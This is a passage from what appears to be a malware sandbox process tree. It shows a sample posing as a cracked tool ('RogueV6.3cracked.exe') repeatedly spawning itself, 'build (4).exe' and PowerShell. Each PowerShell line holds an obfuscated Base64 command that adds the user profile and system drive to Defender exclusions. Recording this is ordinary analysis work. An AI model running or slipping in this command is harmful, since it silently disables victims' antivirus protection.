        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        87⤵
        
        PID:1720
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        87⤵
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        87⤵
        
        PID:7180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        88⤵
        
        PID:7340
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        88⤵
        
        PID:7380
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        88⤵
        
        PID:7400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        89⤵
        
        PID:7568
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        89⤵
        
        PID:7576
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        89⤵
        
        PID:7584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        90⤵
        
        PID:7800
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        90⤵
        
        PID:7808
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        90⤵
        
        PID:7856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        91⤵
        
        PID:8024
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        91⤵
        
        PID:8032
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        91⤵
        
        PID:8112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        92⤵
        
        PID:648
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        92⤵
        
        PID:1732
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        92⤵
        
        PID:2396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        93⤵
        
        PID:7564
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        93⤵
        
        PID:5420
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        93⤵
        
        PID:5012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        94⤵
        
        PID:6972
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        94⤵
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        94⤵
        
        PID:7588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        95⤵
        
        PID:8012
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        95⤵
        
        PID:5456
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        95⤵
        
        PID:7860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        96⤵
        
        PID:7964
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        96⤵
        
        PID:6636
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        96⤵
        
        PID:7524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        97⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        97⤵
        
        PID:5548
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        97⤵
        
        PID:2812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        98⤵
        
        PID:7748
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        98⤵
        
        PID:6596
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        98⤵
        
        PID:7684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        99⤵
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        99⤵
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        99⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        100⤵
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        100⤵
        
        PID:6672
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        100⤵
        
        PID:5616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        101⤵
        
        PID:5976
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        102⤵
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        101⤵
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        101⤵
        System Location Discovery: System Language Discovery
        
        PID:3696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        102⤵
        
        PID:5528
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        103⤵
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        102⤵
        
        PID:7988
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        102⤵
        
        PID:2812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        103⤵
        System Location Discovery: System Language Discovery
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        103⤵
        
        PID:7124
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        103⤵
        
        PID:5072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        104⤵
        
        PID:7024
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        104⤵
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        104⤵
        
        PID:6996
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        105⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        105⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        105⤵
        System Location Discovery: System Language Discovery
        
        PID:6712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        106⤵
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        106⤵
        
        PID:7368
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        106⤵
        
        PID:6792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        107⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        107⤵
        
        PID:3628
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        107⤵
        
        PID:6716
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        108⤵
        
        PID:6044
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        109⤵
        
        PID:6996
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        108⤵
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        108⤵
        
        PID:3928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        109⤵
        
        PID:6136
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        109⤵
        
        PID:3792
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        109⤵
        
        PID:7112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        110⤵
        
        PID:7500
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        110⤵
        System Location Discovery: System Language Discovery
        
        PID:7244
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        110⤵
        
        PID:484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        111⤵
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        111⤵
        
        PID:7132
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        111⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        112⤵
        System Location Discovery: System Language Discovery
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        112⤵
        
        PID:7128
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        112⤵
        
        PID:1256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        113⤵
        
        PID:6568
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        113⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        113⤵
        
        PID:3368
        
